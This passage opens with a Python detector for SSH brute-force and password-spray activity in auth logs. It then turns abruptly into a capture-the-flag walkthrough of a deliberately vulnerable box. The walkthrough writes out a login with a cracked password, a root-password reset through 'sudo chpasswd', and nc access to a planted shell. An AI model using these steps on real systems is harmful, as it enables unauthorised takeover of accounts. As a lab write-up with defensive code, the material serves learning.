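Nov 24 21:40:11 localhost sshd[2310]: Failed password for RickSanchez from 172.16.20.52 port 41002 ssh2
Nov 24 21:40:11 localhost sshd[2311]: Failed password for RickSanchez from 172.16.20.52 port 41004 ssh2
Nov 24 21:40:11 localhost sshd[2312]: Failed password for RickSanchez from 172.16.20.52 port 41006 ssh2
Nov 24 21:40:12 localhost sshd[2313]: Failed password for RickSanchez from 172.16.20.52 port 41008 ssh2
Nov 24 21:40:12 localhost sshd[2314]: Failed password for RickSanchez from 172.16.20.52 port 41010 ssh2
Nov 24 21:40:12 localhost sshd[2315]: Failed password for RickSanchez from 172.16.20.52 port 41012 ssh2
Nov 24 21:40:13 localhost sshd[2316]: Accepted password for RickSanchez from 172.16.20.52 port 41014 ssh2
Nov 24 22:05:30 localhost sshd[2500]: Failed password for Summer from 172.16.20.51 port 50200 ssh2
Nov 24 22:05:36 localhost sshd[2500]: Accepted password for Summer from 172.16.20.51 port 50200 ssh2
"""


def parse_events(text: str) -> List[dict]:
    """Turn matching sshd lines into events, oldest first; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            events.append({
                # this log format carries no year, so only time deltas are meaningful
                "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
                "src": m["src"], "user": m["user"],
                "ok": m["result"] == "Accepted",
            })
    return sorted(events, key=lambda e: e["ts"])


def peak_failures(failures: List[dict], window_seconds: int) -> int:
    """Largest number of failures that fall inside any window_seconds span."""
    peak = 0
    for i, first in enumerate(failures):
        in_window = [e for e in failures[i:]
                     if (e["ts"] - first["ts"]).total_seconds() <= window_seconds]
        peak = max(peak, len(in_window))
    return peak


def analyze(text: str, window_seconds: int = 60,
            failure_threshold: int = 5, spray_users: int = 3) -> Dict[str, dict]:
    """Per source address: brute-force and spray indicators, plus any account
    that logged in after that source had already been failing."""
    by_src: Dict[str, List[dict]] = defaultdict(list)
    for e in parse_events(text):
        by_src[e["src"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if not e["ok"]]
        indicators = []
        peak = peak_failures(failures, window_seconds)
        if peak >= failure_threshold:        # many tries, fast: a wordlist against an account
            indicators.append(f"brute force: {peak} failures within {window_seconds}s")
        users_failed = {e["user"] for e in failures}
        if len(users_failed) >= spray_users:  # failures spread across several accounts
            indicators.append(f"password spray: {len(users_failed)} accounts tried")
        if not indicators:
            continue                         # a single typo from a real user is not a finding
        compromised = sorted({e["user"] for e in evs
                              if e["ok"] and any(f["ts"] <= e["ts"] for f in failures)})
        findings[src] = {"failures": len(failures),
                         "indicators": indicators, "compromised": compromised}
    return findings


if __name__ == "__main__":
    for src, finding in analyze(SAMPLE_LOG).items():
        print(src, finding)
```

Real Hydra runs with -t 64 produce far more lines per second than the sample, so the same logic fires well before a wordlist is exhausted.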
We successfully found the password for RickSanchez’s account. Let’s log into the machine and see if this account is one of the sudoers.
```
andrew@kali:~$ ssh RickSanchez@172.16.20.50 -p 22222
RickSanchez@172.16.20.50's password:
Last login: Thu Sep 21 09:45:24 2017
[RickSanchez@localhost ~]$ sudo echo "root:password" | sudo chpasswd
[sudo] password for RickSanchez:
[RickSanchez@localhost ~]$
```
It took the command! Let’s verify that we can log in using the root account.
```
andrew@kali:~$ ssh root@172.16.20.50 -p 22222
root@172.16.20.50's password:
Last login: Fri Sep 15 11:44:15 2017
```
We’ve successfully rooted the box! While we’ve gained access to the root account, we still need to find more flags. Let’s see what we can find in the root’s directory.
```
[root@localhost ~]# ls -l
total 8
-rw-------. 1 root root 1214 Aug 18  2017 anaconda-ks.cfg
-rw-r--r--. 1 root root   40 Aug 22  2017 FLAG.txt
```
We found another flag! Let’s take a look.
```
[root@localhost ~]# head FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points
```
At this point, we’re at 110 points. We’re 20 more points away from the finish line.
Flag #7 – 30 Points
Ionic Defibrillator
HTTPS – Port 9090
Since we have two more ports that we haven’t tried, let’s move on to those and see if we can find any more flags. The Nmap scan that we performed earlier detected that port 9090 is HTTPS.
```
andrew@kali:~$ curl -k https://172.16.20.50:9090 | grep FLAG
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
<div id="brand">FLAG <b>{There is no Zeus, in your face!} - 10 Points</b></div><!--/#brand-->
100 41766    0 41766    0     0  4078k      0 --:--:-- --:--:-- --:--:-- 4078k
```
We found another flag. At this point, we just need one more and we’re done.
Flag #8 – 10 Points
There is no Zeus, in your face!
We have two options from here: perform directory scanning or move on to the next port. Let’s opt for the latter and come back if that’s a dead end.
Port 60000
Since our Nmap scan didn’t recognize what protocol this port is running, we’ll use Netcat to connect to it.
```
andrew@kali:~$ nc 172.16.20.50 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# head FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
```
We’ve finally managed to capture the last flag. Now, we’ve completed this CTF challenge.
Flag #9 – 10 Points
Flip the pickle Morty!
Final Thoughts
While CTFs provide learning opportunities, participants are hacking deliberately vulnerable systems. In the real world, when companies pay for penetration testing services, they tend to have a security team that keeps their systems secure.
Don’t get me wrong, CTF is a great way to learn offensive security skills, so don’t let that discourage you. Some of the tools that CTF players use are the same ones used in the real world. But, you must understand that penetration testing in the real world is different and a serious business.
If you are interested in becoming a pentester, make sure to understand the difference between CTF and pentesting. I stumbled upon this book that I want to read eventually.